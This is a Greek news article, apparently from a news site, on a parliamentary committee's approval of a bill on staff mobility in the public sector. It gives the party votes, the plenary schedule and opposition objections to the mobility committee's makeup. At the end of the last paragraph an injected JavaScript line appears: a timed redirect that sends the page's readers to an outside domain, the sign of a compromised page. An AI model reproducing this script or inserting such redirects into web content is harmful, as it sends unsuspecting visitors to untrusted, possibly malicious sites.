Υπερψηφίστηκε το ν/σ για την κινητικότητα στο Δημόσιο

0
2

 

Ψηφίστηκε κατά πλειοψηφία επί της αρχής, στα άρθρα και στο σύνολό του από την αρμόδια επιτροπή της Βουλής το νομοσχέδιο του υπουργείου Διοικητικής Ανασυγκρότησης για την κινητικότητα στο Δημόσιο.

Υπέρ ψήφισαν ο ΣΥΡΙΖΑ και οι Ανεξάρτητοι Έλληνες, κατά η ΝΔ, η Χρυσή Αυγή, το ΚΚΕ, το Ποτάμι και η Ένωση Κεντρώων, ενώ η Δημοκρατική Συμπαράταξη (ΠΑΣΟΚ, ΔΗΜΑΡ) δήλωσε παρών. Το νομοσχέδιο θα εισαχθεί προς συζήτηση στην ολομέλεια με τη διαδικασία του επείγοντος αύριο το απόγευμα, ενώ θα τεθεί προς ψήφιση την Παρασκευή.

Διαφωνίες υπήρξαν από την πλευρά της αντιπολίτευσης, αλλά και επί μέρους παρατηρήσεις και προτάσεις, τις οποίες η υπουργός Όλγα Γεροβασίλη διαβεβαίωσε ότι θα τις εξετάσει προσεκτικά μέσω των πρακτικών, και όπου υπάρχει η δυνατότητα θα προχωρήσει σε διορθώσεις.

Όπως ανέφεραν στελέχη της αντιπολίτευσης, παρά τις κυβερνητικές διακηρύξεις για πάταξη των πελατειακών σχέσεων, τα τέσσερα από τα επτά μέλη της Κεντρικής Επιτροπής Κινητικότητας είναι άμεσα ή έμμεσα ελεγχόμενα από τον εκάστοτε υπουργό, ενώ απουσιάζουν τα αντικειμενικά κριτήρια για την αποδοχή ή όχι των αιτημάτων για μεταθέσεις. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here